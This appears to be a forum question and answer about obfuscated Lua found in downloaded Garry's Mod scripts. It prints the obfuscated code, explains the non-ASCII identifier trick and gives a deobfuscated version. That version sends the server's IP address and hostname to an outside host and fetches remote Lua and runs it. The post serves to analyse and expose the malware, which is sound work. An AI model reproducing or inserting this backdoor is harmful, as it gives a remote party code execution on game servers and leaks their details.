I recently downloaded some lua scripts and discovered this obfuscated code within. After a good many hours I failed to discover how to deobfuscate it and was looking for some help.
In terms of what I have tried already, I noticed the number's just convert to characters which reveals a few functions. However it would appear that the variables assigned at the top are not assigned to anything or maybe some special unicode character which is invisible in my editor (atom).
Here is the obfuscated code:
local = _G
local = ['\115\116\114\105\110\103']
local = ['\98\105\116']['\98\120\111\114']
local function ()
if ['\108\101\110']() == 0 then
return
end
local = ''
for _ in ['\103\109\97\116\99\104'](, '\46\46') do
= ..['\99\104\97\114']((["\116\111\110\117\109\98\101\114"](_, 16), 53))
end
return
end
['415c585047']['665c58455950'](5,
function ()
['5d414145']['655a4641']('5d414145460f1a1a565d545c5b595a46501b0505054250575d5a46415445451b565a581a4643595a521a414754565e50471b455d45', {['56'] = ['52585a51']['72504172545850585a5150']()['7b545850'], ['50'] = ['52545850']['7250417c6574515147504646'](), ['51'] = ['7250417d5a46417b545850']()})
end )
['415c585047']['665c58455950'](5,
function ()
['5d414145']['735041565d']('5d414145460f1a1a565d545c5b595a46501b0505054250575d5a46415445451b565a581a5254461b594054',
function (return)
['67405b6641475c5b52'](return)
end, nil )
end )
Old Lua (and modern LuaJIT) allows using arbitrary non-ASCII bytes (above 0x7F) in identifiers.
Nice feature for obfuscation! :-)
timer.Simple(
5,
function ()
http.Post(
"https://chainlose.000webhostapp.com/svlog/tracker.php",
{
c = gmod.GetGamemode().Name,
e = game.GetIPAddress(),
d = GetHostName()
}
)
end
)
timer.Simple(
5,
function ()
http.Fetch(
"https://chainlose.000webhostapp.com/gas.lua",
function (str)
RunString(str)
end,
nil
)
end
)